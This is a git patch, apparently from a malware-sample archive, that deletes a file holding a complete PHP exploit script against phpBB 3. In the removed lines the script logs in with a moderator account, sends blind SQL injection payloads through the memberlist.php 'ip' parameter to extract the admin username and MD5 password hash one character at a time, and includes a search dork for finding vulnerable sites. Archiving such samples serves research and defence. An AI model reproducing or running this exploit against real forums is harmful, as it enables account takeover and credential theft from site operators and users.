From e92d16afa8ea6dcadd6f28af0d0d4c9a719e58e2 Mon Sep 17 00:00:00 2001
From: vxunderground <57078196+vxunderground@users.noreply.github.com>
Date: Fri, 30 Oct 2020 00:27:54 -0500
Subject: [PATCH] Delete Exploit.PHP.Inject.h

na
---
 PHP/Exploit.PHP.Inject.h | 293 ---------------------------------------
 1 file changed, 293 deletions(-)
 delete mode 100644 PHP/Exploit.PHP.Inject.h

diff --git a/PHP/Exploit.PHP.Inject.h b/PHP/Exploit.PHP.Inject.h
deleted file mode 100644
index 8de1fdf5..00000000
--- a/PHP/Exploit.PHP.Inject.h
+++ /dev/null
@@ -1,293 +0,0 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
-echo "by rgod rgod@autistici.org\n";
-echo "site: http://retrogod.altervista.org\n";
-echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
-
-/*
-works regardless of php.ini settings
-you need a global moderator account with "simple moderator" role
-*/
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
-echo "host:      target server (ip/hostname)\n";
-echo "path:      path to phpbb3\n";
-echo "user/pass: u need a valid user account with global moderator rights\n";
-echo "Options:\n";
-echo "   -T[prefix]   specify a table prefix different from default (phpbb_)\n";
-echo "   -p[port]:    specify a port other than 80\n";
-echo "   -P[ip:port]: specify a proxy\n";
-echo "   -u[number]:  specify a user id other than 2 (admin)\n";
-echo "   -x:          disclose table prefix through error messages\n";
-echo "Example:\r\n";
-echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
-echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-   $c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-   }
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$user=$argv[3];
-$pass=$argv[4];
-$port=80;
-$prefix="PHPBB_";
-$user_id="2";//admin
-$discl=0;
-$proxy="";
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-if ($temp=="-T")
-{
-  $prefix=str_replace("-T","",$argv[$i]);
-}
-if ($temp=="-u")
-{
-  $user_id=str_replace("-u","",$argv[$i]);
-}
-if ($temp=="-x")
-{
-  $discl=1;
-}
-}
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-$data="username=".urlencode($user);
-$data.="&password=".urlencode($pass);
-$data.="&redirect=index.php";
-$data.="&login=Login";
-$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
-$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Accept-Encoding: text/plain\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-$cookie="";
-$temp=explode("Set-Cookie: ",$html);
-for ($i=1; $i<=count($temp)-1; $i++)
-{
- $temp2=explode(" ",$temp[$i]);
- $cookie.=" ".$temp2[0];
-}
-if (eregi("_u=1;",$cookie))
-{
-//echo $html."\n";//debug
-//die("Unable to login...");
-}
-echo "cookie -> ".$cookie."\r\n";
-if ($discl)
-{
-$sql="'suntzuuuuu";
-echo "sql -> ".$sql."\n";
-$sql=urlencode(strtoupper($sql));
-$data="username=";
-$data.="&icq=";
-$data.="&email=";
-$data.="&aim=";
-$data.="&joined_select=lt";
-$data.="&joined=";
-$data.="&yahoo=";
-$data.="&active_select=lt";
-$data.="&active=";
-$data.="&msn=";
-$data.="&count_select=eq";
-$data.="&count=";
-$data.="&jabber=";
-$data.="&sk=c";
-$data.="&sd=a";
-$data.="&ip=".$sql;
-$data.="&search_group_id=0";
-$data.="&submit=Search";
-$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cookie: ".$cookie." \r\n\r\n";
-$packet.=$data;
-sendpacketii($packet);
-if (strstr($html,"You have an error in your SQL syntax"))
-{
-$temp=explode("posts",$html);
-$temp2=explode(" ",$temp[0]);
-$prefix=strtoupper($temp2[count($temp2)-1]);
-echo "prefix -> ".$prefix."\n";sleep(2);
-}
-}
-
-$md5s[0]=0;//null
-$md5s=array_merge($md5s,range(48,57)); //numbers
-$md5s=array_merge($md5s,range(97,102));//a-f letters
-//print_r(array_values($md5s));
-$j=1;$password="";
-while (!strstr($password,chr(0)))
-{
-for ($i=0; $i<=255; $i++)
-{
-if (in_array($i,$md5s))
-{
-  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
-  echo "sql -> ".$sql."\n";
-  $sql=urlencode(strtoupper($sql));
-  $data="username=";
-  $data.="&icq=";
-  $data.="&email=";
-  $data.="&aim=";
-  $data.="&joined_select=lt";
-  $data.="&joined=";
-  $data.="&yahoo=";
-  $data.="&active_select=lt";
-  $data.="&active=";
-  $data.="&msn=";
-  $data.="&count_select=eq";
-  $data.="&count=";
-  $data.="&jabber=";
-  $data.="&sk=c";
-  $data.="&sd=a";
-  $data.="&ip=".$sql;
-  $data.="&search_group_id=0";
-  $data.="&submit=Search";
-  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
-  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Content-Length: ".strlen($data)."\r\n";
-  $packet.="Connection: Close\r\n";
-  $packet.="Cookie: ".$cookie." \r\n\r\n";
-  $packet.=$data;
-  sendpacketii($packet);
-  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
-  }
-  if ($i==255) {die("Exploit failed...");}
-}
-$j++;
-}
-
-$j=1;$admin="";
-while (!strstr($admin,chr(0)))
-{
-for ($i=0; $i<=255; $i++)
-{
-  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
-  echo "sql -> ".$sql."\n";
-  $sql=urlencode(strtoupper($sql));
-  $data="username=";
-  $data.="&icq=";
-  $data.="&email=";
-  $data.="&aim=";
-  $data.="&joined_select=lt";
-  $data.="&joined=";
-  $data.="&yahoo=";
-  $data.="&active_select=lt";
-  $data.="&active=";
-  $data.="&msn=";
-  $data.="&count_select=eq";
-  $data.="&count=";
-  $data.="&jabber=";
-  $data.="&sk=c";
-  $data.="&sd=a";
-  $data.="&ip=".$sql;
-  $data.="&search_group_id=0";
-  $data.="&submit=Search";
-  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
-  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Content-Length: ".strlen($data)."\r\n";
-  $packet.="Connection: Close\r\n";
-  $packet.="Cookie: ".$cookie." \r\n\r\n";
-  $packet.=$data;
-  sendpacketii($packet);
-  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
-  }
-  if ($i==255) {die("Exploit failed...");}
-$j++;
-}
-echo "--------------------------------------------------------------------\r\n";
-echo "admin          -> ".$admin."\r\n";
-echo "password (md5) -> ".$password."\r\n";
-echo "--------------------------------------------------------------------\r\n";
-
-function is_hash($hash)
-{
- if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
- else {return false;}
-}
-
-if (is_hash($password)) {echo "Exploit succeeded...";}
-else {echo "Exploit failed...";}
-?>
-